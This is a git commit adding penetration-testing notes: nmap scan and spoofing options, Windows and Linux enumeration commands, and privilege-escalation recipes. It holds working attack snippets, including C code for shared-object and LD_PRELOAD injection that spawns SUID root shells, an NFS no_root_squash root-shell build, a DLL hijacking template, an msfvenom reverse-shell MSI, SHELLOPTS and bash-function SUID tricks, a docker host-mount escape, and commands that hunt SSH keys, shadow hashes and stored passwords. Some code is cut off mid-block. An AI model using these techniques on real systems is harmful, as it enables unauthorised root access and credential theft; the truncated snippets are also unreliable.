This commit is contained in:
Stefan Etringer 2021-10-23 02:03:06 +02:00
parent b35bcc5560
commit 016773b802
27 changed files with 4487 additions and 8 deletions

.gitmodules vendored
View File

@ -40,3 +40,12 @@
[submodule "enumeration/RustScan"]
path = enumeration/RustScan
url =
[submodule "post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester"]
path = post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester
url =
[submodule "post_exploitation/priv_esc/privesc-scripts/linux-smart-enumeration"]
path = post_exploitation/priv_esc/privesc-scripts/linux-smart-enumeration
url =
[submodule "post_exploitation/priv_esc/privesc-scripts/linuxprivchecker"]
path = post_exploitation/priv_esc/privesc-scripts/linuxprivchecker
url =

View File

@ -1,6 +1,20 @@
# nmap
# Usage
## Scan Types
## Port States
1. Open
2. Closed
3. Filtered
4. Unfiltered
5. Open|Filtered
6. Close|Filtered
## Usage
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
@ -9,13 +23,105 @@ nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit <IP>
nmap -oA nmap-vuln -Pn -script vuln -p <Port,Port,Port,...> <IP>
## combo with searchsploit
### combo with searchsploit
* nmap-full scan
sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
searchsploit --nmap ./nmap-full.xml --verbose
## Wordpress Enumeration
### Wordpress Enumeration
nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80
### Use List of Hosts
nmap -iL <ListofHosts>
* Show hosts, dns resolution included
nmap -sL -n
### ARP Scan Local Network
nmap -PR -sn
### ICMP Scans
* __Type 8__ (Ping Request)
nmap -PE -sn
* __Type 13__ (Timestamp Request)
nmap -PP -sn
* __Type 17__ (Address Mask Queries)
nmap -PM -sn
### TCP Scans
* `-PS23` Syn on port 23
* `-PA80-8080` ACK on port range 80-8080
#### TCP Scan Types
* __Null Scan__ `-sN`, port is open when there is no response. Otherwise the response is `RST/ACK`
* __FIN Scan__ `-sF` , same procedure as null scan.
* __Xmas Scan__ `-sX`, `FIN/PSH/URG` is sent. `RST/ACK` when port is closed.
* __Maimon Scan__ `-sM`, sends `FIN/ACK`. Packet is dropped when port is open. Only viable on old BSD networks.
* __ACK Scan__ `-sA`, sends `ACK`. Receives `RST` regardless of the state of the port. May be used to explore firewall rules.
* __Window Scan__ `-sW`, sends `ACK`, and receives `RST` as well. Inspects the window part of the response. Used to expose firewall rules.
* __Custom Scan__ `--scanflags RSTACKFIN`, set flags randomly.
### UDP SCans
* `-PU`
* May be answered by ICMP Type 3 if the port is not reachable
### DNS Scan
* No lookup `-n`
* Reverse lookup for every host `-R`
* Host discovery only `-sn`
### Spoofing
* IP `-S <spoofed-IP>`
* MAC `--spoof-mac <spoofed-MAC>`
* Disable ping scan `-Pn`
* Decoy addresses `-D <decoy-IP>,<decoy-IP>,<decoy-IP>,RND,RND,ME`
### Service Detection
* `-sV`
* `--version-intensity <level 0-9>`
* Intensity 2 `--version-light`
* Intensity 9 `--version-all`
## Scripts
Installed at `/usr/share/nmap/scripts`
* __auth__ Authentication related scripts
* __broadcast__ Discover hosts by sending broadcast messages
* __brute__ Performs brute-force password auditing against logins
* __default__ Default scripts, same as -sC
* __discovery__ Retrieve accessible information, such as database tables and DNS names
* __dos Detects__ servers vulnerable to Denial of Service (DoS)
* __exploit__ Attempts to exploit various vulnerable services
* __external__ Checks using a third-party service, such as Geoplugin and Virustotal
* __fuzzer__ Launch fuzzing attacks
* __intrusive__ Intrusive scripts such as brute-force attacks and exploitation
* __malware__ Scans for backdoors
* __safe__ Safe scripts that wont crash the target
* __version__ Retrieve service versions
* __vuln__ Checks for vulnerabilities or exploit vulnerable services
## Tips & Tricks
* Scan the 100 most interesting ports via `-F`
* `--top-ports 100`
* One probe every 5 minutes via `-T0`
* A closed port responds with `RST/ACK` to a initial `SYN`
* Scan ports iteratively by using `-r`, not random
* Closed Port
* Control packet rate via `--min-rate` and `--max-rate`
* Control parallel probes via `--min-parallelism` and `--max-parallelism`
* Fragment packets `-f` 8 bytes, `-ff` 16 bytes or `--mtu`
* Zombie Scan `-sI <pwnd-device-IP>` via pwnd host inside the targets network
* `--reason`, `-d`, `-vv`
* `--traceroute`

View File

@ -63,7 +63,7 @@ Get-ChildItem | Sort-Object
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
Get-HotFix | Format-list | findstr <searchstring>
Get-HotFix | Format-list | findstr <searchstring>
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
@ -160,6 +160,10 @@ Get-WmiObject win32_useraccount | Select name, sid
### Network intel
* Connections
netstat -ano
* IP Address
@ -183,7 +187,14 @@ Get-Hotfix
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
wmic qfe get Caption,Description,HotFixID,InstalledOn
### Drivers
### Processes
* Start processes
@ -195,6 +206,10 @@ Start-Process <process>
Get-Process <process>
### Scheduled tasks
schtasks /query /fo LIST /v
* Scheduled Tasks, by TaskName
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
@ -236,6 +251,15 @@ for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
### Antivirus
sc query windefend
* Service name unknown
sc queryex type=service
### Using Powerview
Import-Module .\powerview.ps1

View File

@ -0,0 +1,21 @@
* Preload libs and do interpositioning of functions.
## Example
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
* `gcc -fPIC -shared -o lib.c -nostartfiles`
* `sudo apache2`
* `$ id`

View File

@ -0,0 +1,21 @@
# NFS RootSquash
* [hacktricks](
* `no_root_squash` has to be as an option on the NFS device
## Usage
* `showmount -e <target-IP>`
* `mkdir /tmp/net_volume`
* Connect to NFS share
mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume
* Create root shell inside the dir of the share
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c
gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell
chmod +s /tmp/net_volume/shell

View File

@ -0,0 +1,24 @@
# Shared Object Injection
* [gaffe23](
* [exploit-db](
* Test binary via
strace <binary> 2>&1 | grep -i -E "open|access|no such file"
## Example
#include <stdio.h>
#include <stdlib.h>
static void inject ( ) __attribute__ ( (constructor) );
void inject ( ) {
system ( "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" );
* `gcc -fPIC -shared -o ~/.config/ ~/.config/lib.c`
* Run binary using the lib

View File

@ -0,0 +1,42 @@
# DLL Hijacking
## Search Orders
* __SafeDllSearchMode__ enabled searches paths in following order:
* __cwd__ of executable
* System directory, `GetSystemDirectory`
* 16-bit system directory
* Windows, `GetWindowsDirectory`
* __pwd__
* __SafeDllSearchMode__ disabled searches in following order:
* __cwd__ of executable
* __pwd__
* System directory
* 16-bit system directory
* Windows directory
* PATH environment variable
## Template
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
return TRUE;
* Compilation via
x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
* Upload to target
* Restart dllsvervice via
sc stop dllsvc
sc start dllsvc

View File

@ -0,0 +1,14 @@
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
return TRUE;

Binary file not shown.

View File

@ -11,7 +11,14 @@ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Po
* start the msi on target
msiexec /quiet /qn /i C:\shell.msi
msiexec /quiet /qn /i C:\Temp\shell.msi
## Set Registry Keys
* Alternative method
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

View File

@ -1,7 +1,10 @@
# Unquoted Path
* Path to a service without quotes can be hijacked by inserting other executables and services into the path.
* Some part of path has to be writeable.
* Some part of path has to be writeable, windows tries to insert `.exe` instead of a space.
* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
* Check permissions on paths via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
## Example
* The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`

View File

@ -50,10 +50,18 @@ find / -name "*sock"
* Mount the host volume and chroot to it, need alpine image
* Mount the host volume and chroot to it, need alpine image.
docker images
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
docker run -v /:/host --rm -it <imageID> chroot /host/ bash
## Shared Namespaces
* Namespaces

View File

@ -0,0 +1,37 @@
# Linux enumeration
* `cat /etc/*-release` * `cat /proc/version`
* `hostname`
* `uname -a`
* `cat /etc/issue`
* `ps wuax ` or `ps ajxf` or `ps -A`
* `printenv` or `env`
* `sudo -l`
* `id`
* `whoami`
* `groups` and `getent group`
* `cat /etc/passwd`
* `history`
* `ip` or `ifconfig`
* `ip route`
* `netstat -natup` or `ss natup`
* `netstat -s` and `netstat -i`
* `lsof -i`
* Find SUID permissions on files and dirs
* `find / -perm /6000 -ls 2>/dev/null`
* Find writeables dirs
* `find / -writable -type d 2>/dev/null` or `find / -perm -o w -type d 2>/dev/null`
* `find / -perm -o x -type d 2>/dev/null`
* Find writeable subdirs
`find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u`

View File

@ -0,0 +1,6 @@
# Man In the Middle
* [Ettercap](
* [Bettercap](

View File

@ -5,4 +5,72 @@
* [LinEnum](
* [Smart Enumeration](
* [Linux Exploit Suggester](
* [GTFObins](
* [GTFObins](
* [Linpeas](
## Kernel Exploits
### Dirty COW
* [CVE-2016-5195](
* [c0w.c](../kernel-exploits/dirtycow)
## Stored Keys & Passwords
* History
* Environment Variables
* Config + Dot Files
* SSH keys
find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
## Permissions
* Weak permissions
* Umask
* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
* list
find / -perm /6000 -ls 2>dev/null
* [Shared object injection](../../../exploit/linux/
* [CVE-2016-1247](
## Sudo Binary
* [Baron Samedit](../../../exploit/linux/sudo/
* [CVE-2019-14287](../../../exploit/linux/sudo/
* [CVE-2019-18634](../../../exploit/linux/sudo/
* [LD_PRELOAD](../../../exploit/linux/
* `sudo -l`
* Take a look at GTFObins
* Keep an eye on the displayed host and env capabilities
## PATH Hijacking
* Interpositioning binaries via PATH
* Look for binaries used in other bins and scripts
* Interposition name and add the directory in front of `$PATH`
## Bash function
* Interpositioning of binaries via bash functions
function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /path/to/binary
* Call binary which invokes this function
## Environment Variable
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
## Capabilities
* [capabilities](../../../exploit/linux/
## Crontab
* Check `cat /etc/crontab`
* Check writable scripts and binaries that are scheduled
* Check `$PATH` order
## NFS Rootsquash
* [nfs rootsquash](../../../exploit/linux/

View File

@ -4,3 +4,74 @@
* [Fundamentals](
* [PowerShellEmpire](
* [JAWS](
## Account Types
* __Administrator__ local & domain
* __Standard__ local & domain
* __Guest__
* __System__
## Enumeration
### Users & Groups
whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
### Files
* [powershell](../../../../enumeration/windows/
### System
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
* Installed software
wmic product get name,version,vendor
* Services
wmic service list brief | findstr "Running"
## Exploit
### DLL Hijacking
* [DLL hijacking](../../../../exploit/windows/dll_hijacking/
### Unquoted Service Path
* [unquoted service path](../../../../exploit/windows/docs/
### Token Impersonation
* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
* Hot Potato is best before Server 2019 and Windows 10 (version 1809)
* [Potatos](../../../../exploit/windows/docs/
### Schedules Tasks
* `schtasks`
* `Autoruns64.exe`
### MSI Elevated Installer
* [Always install elevated](../../../../exploit/windows/docs/
### Search for Credentials
cmdkey /list
* Use found credentials
runas /savecred /user:<user> reverse_shell.exe
* Keys containing passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Binary file not shown.

File diff suppressed because one or more lines are too long

Binary file not shown.

@ -0,0 +1 @@
Subproject commit 60cf85b349f32c3410bdff73b421120d39d95470

@ -0,0 +1 @@
Subproject commit 950268573fbb4389fc4cf56b8d75bfb826564e1d

@ -0,0 +1 @@
Subproject commit ebf996195c767a9f2008a6ba97abefd2e558de82

View File

@ -19,6 +19,11 @@ php -e 'exec "/bin/bash";'
python -c 'import pty; pty.spawn("/bin/bash")'
### Perl
perl -e 'exec "/bin/sh";'
## Next
1. `ctrl` + `z`
2. `stty echo -raw`